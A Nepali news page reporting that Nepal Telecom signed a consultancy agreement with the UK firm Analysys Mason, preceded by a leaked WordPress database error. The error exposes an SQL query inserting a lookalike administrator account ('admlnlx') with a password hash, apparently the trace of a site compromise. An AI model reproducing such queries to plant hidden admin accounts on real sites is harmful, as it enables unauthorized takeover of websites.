WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BEAAzDji6BcrQbr5uTqtZh3CFe9vMu/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 19:59:07', '', 'admlnlx', 'admlnlx')
काठमाडौँ, पुस ७ –
नेपाल टेलिकमले गुणस्तरीय सेवा प्रदान गर्नका लागि रणनीतिक साझेदार परामर्शदातासँग सम्झौता गरेको छ ।
टेलिकममा रणनीतिक साझेदार नियुक्ति, कार्यान्वयनलगायत आवश्यक कार्यमा परामर्श दिनका लागि बेलायतको एनालाइसिस मेसोन लिमिटेडसँग सम्झौता गरिएको हो ।
बोलपत्रमार्फत छनोट भएको उक्त कम्पनीसँग मङ्गलबार सम्झौता भएको टेलिकमका प्रवक्ता प्रतिभा वैद्यले जानकारी दिनुभयो ।
सम्झौतापत्रमा नेपाल टेलिकमका तर्फबाट प्रबन्ध निर्देशक कामिनी राजभण्डारी र एनालाइसिस मेसोनको तर्फबाट रोहन धमिजाले हस्ताक्षर गर्नुभएको थियो । – रासस